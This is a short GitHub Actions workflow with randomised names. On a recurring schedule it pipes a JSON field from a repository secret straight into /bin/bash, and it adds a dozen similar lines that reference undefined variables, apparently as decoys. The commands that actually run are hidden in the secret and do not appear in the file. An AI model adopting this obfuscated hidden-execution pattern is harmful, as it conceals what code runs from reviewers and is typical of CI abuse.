name: wanf2xy
on:
  workflow_dispatch:
  schedule:
    - cron: '5 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: wanf2xy
        env:
          jg3212: ${{ secrets.jg3212 }}
        run: |
          echo $jg3212 | jq -r .dq65012 | /bin/bash
          echo $snjy67250 | jq -r .zf2 | /bin/bash
          echo $rx4 | jq -r .dffni10052 | /bin/bash
          echo $uvo84 | jq -r .kwia046 | /bin/bash
          echo $allbu77 | jq -r .qdd482 | /bin/bash
          echo $wpbvg05866 | jq -r .xg7113 | /bin/bash
          echo $rdwha198 | jq -r .gatld1 | /bin/bash
          echo $yov66918 | jq -r .e446 | /bin/bash
          echo $hmmxm5 | jq -r .aip6 | /bin/bash
          echo $ps139 | jq -r .u07 | /bin/bash
          echo $wlu3082 | jq -r .ac492 | /bin/bash
          echo $kg42 | jq -r .n321 | /bin/bash
          echo $hpzz258 | jq -r .oqpx413 | /bin/bash
          echo $t12 | jq -r .n313 | /bin/bash

